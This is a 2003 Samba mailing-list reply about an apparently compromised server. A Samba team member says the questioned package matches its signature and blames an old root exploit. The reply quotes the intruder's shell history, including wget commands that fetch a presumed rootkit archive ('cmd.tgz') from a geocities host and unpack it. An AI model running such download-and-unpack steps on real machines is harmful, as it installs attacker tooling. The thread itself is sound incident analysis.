[Samba] Faked samba packages / rootkit?
Andrew Bartlett
abartlet at samba.org
Sat Dec 27 21:47:25 GMT 2003
On Sun, 2003-12-28 at 07:27, Markus Schabel wrote:
> Does anybody know of these samba packages?
>
> http://ftp.cvut.cz/samba/samba-latest.tar.gz
This copy of Samba 3.0.0 matches the signature I downloaded from
samba.org, using GPG. Your copy may vary however.
> AFAICS they are faked and contain some kind of rootkit (you can see
> this in the history below. the server this history is from is taken
> offline for security reasons, and nobody is there till 7th Jan I
> can't give you more details)
I would suggest the you were running Samba < 2.2.8a, and were rooted by
the commonly available root exploit, and the attacker prefers not to
allow the next passer by to break into your box too.
> > 182 cd .nlp
> > 183 wget geocities.com/st3lly/cmd.tg
> > 184 wget http://geocities.com/st3lly/cmd.tg
> > 185 wget http://geocities.com/st3lly/cmd.tgz
> > 186 tar zxvf cmd.tgz
I would suggest the rootkits start here...
Andrew Bartlett
--
Andrew Bartlett abartlet at pcug.org.au
Manager, Authentication Subsystems, Samba Team abartlet at samba.org
Student Network Administrator, Hawker College abartlet at hawkerc.net
http://samba.org http://build.samba.org http://hawkerc.net
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.samba.org/archive/samba/attachments/20031228/fa895a1e/attachment.bin
More information about the samba
mailing list